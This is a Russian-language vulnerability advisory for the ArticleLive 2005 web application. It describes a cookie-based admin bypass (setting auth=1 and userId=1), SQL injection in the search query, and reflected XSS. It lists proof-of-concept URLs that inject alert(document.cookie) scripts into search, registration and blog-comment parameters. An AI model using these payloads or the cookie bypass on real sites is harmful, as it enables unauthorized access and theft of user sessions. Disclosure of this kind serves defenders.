Программа: ArticleLive 2005
Уязвимости позволяют удаленному
пользователю получить административный
доступ, произвести XSS нападение и выполнить
произвольные SQL команды в базе данных
приложения.
1. Удаленный пользователь может изменить
значения переменных auth=1 и userId=1 в файле куки
и получить неавторизованный
административный доступ к приложению.
2. Удаленный пользователь может выполнить
произвольные SQL команды в базе данных
приложения.
Пример:
http://[target]/search?PHPSESSID=[si d]& Query='Information
DisclosureCategories=0
3. Отсутствует фильтрация входных данных в
нескольких компонентах приложения.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/search?PHPSESSID=[sid]&Query='%22%3E%3 Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
http://[target]/authors/register/do?PHPSESSID=[sid]&Username
='"><script>alert(document.cookie)</script>&Password=dcrab
&PasswordConfirm=dcrab&FirstName=&LastName=&Email= &Biography=dcrab&Picture=dcrab
http://[target]/authors/register/do?PHPSESSID=[sid]&Username =&Password=dcrab&PasswordConfirm=dcrab&FirstName='">
<script>alert(document.cookie)</script>&LastName=&Email=
&Biography=dcrab&Picture=dcrab
http://[target]/authors/register/do?PHPSESSID=[sid]&Username =&Password=dcrab&PasswordConfirm=dcrab&FirstName=&
LastName='"><script>alert(document.cookie)</script>&Email=
&Biography=dcrab&Picture=dcrab
http://[target]/authors/register/do?PHPSESSID=[sid]&Username =&Password=dcrab&PasswordConfirm=dcrab&FirstName=&
LastName=&Email='"><script>alert(document.cookie)</script>
&Biography=dcrab&Picture=dcrab
http://[target]/authors/register/do?PHPSESSID=[sid]&Username =&Password=dcrab&PasswordConfirm=dcrab&FirstName=&
LastName=&Email=&Biography=%3C/textarea%3E%3Cscript% 3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
http://[target]/blogs/newcomment/?BlogId='"><script> alert(document.cookie)</script>